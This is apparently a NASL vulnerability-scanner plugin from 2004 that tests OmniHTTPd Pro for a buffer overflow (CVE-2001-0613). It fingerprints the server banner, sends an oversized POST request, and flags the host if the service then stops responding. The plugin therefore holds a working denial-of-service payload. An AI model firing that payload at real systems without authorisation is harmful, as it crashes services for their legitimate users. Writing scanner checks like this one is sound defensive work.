#
#  This script was written by David Maciejak <david dot maciejak at kyxar dot fr>
#
#  Ref: SNS Research  - <vuln-dev@greyhack com>
# 
#  This script is released under the GNU GPLv2
#

if(description)
{
 script_id(15553);
 script_bugtraq_id(2730);
 script_cve_id("CVE-2001-0613");
 script_xref(name:"OSVDB", value:"1829");
 
 script_version("$Revision: 8287 $");
 script_tag(name:"cvss_base", value:"5.0");
 script_tag(name:"risk_factor", value:"Medium");
 
 name = "OmniHTTPd pro long POST DoS";
 script_name(name);
 
 desc = "
The remote host is running OmniHTTPd Pro HTTP Server.

The remote version of this software seems to be vulnerable to a buffer 
overflow when handling specially long POST request. This may allow an
attacker to crash the remote service, thus preventing it from answering 
legitimate client requests.

Solution : None at this time
Risk factor : High";



 script_description(desc);
 
 summary = "Test OmniHTTPd pro long POST DoS";
 script_summary(summary);
 
 script_category(ACT_DENIAL);
 
  script_copyright("This script is Copyright (C) 2004 David Maciejak");
 family = "Denial of Service";
 
 script_family(family);
 script_dependencie("http_version.nasl");
 script_require_ports("Services/www",80);
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);
if (! get_port_state(port)) exit(0);
if ( http_is_dead(port:port) ) exit(0);


banner = get_http_banner(port:port);
if ( ! banner ) exit(0);
if ( ! egrep(pattern:"^Server: OmniHTTPd", string:banner ) ) exit(0);

soc = http_open_socket(port);
if (! soc) exit(0);

len = 4200;	# 4111 should be enough
req = string("POST ", "/", " HTTP/1.0\r\nContent-Length: ", len,
	"\r\n\r\n", crap(len), "\r\n");
send(socket:soc, data:req);
http_close_socket(soc);

sleep(1);

if(http_is_dead(port: port))
{
 security_hole(port);
 exit(0);
} 
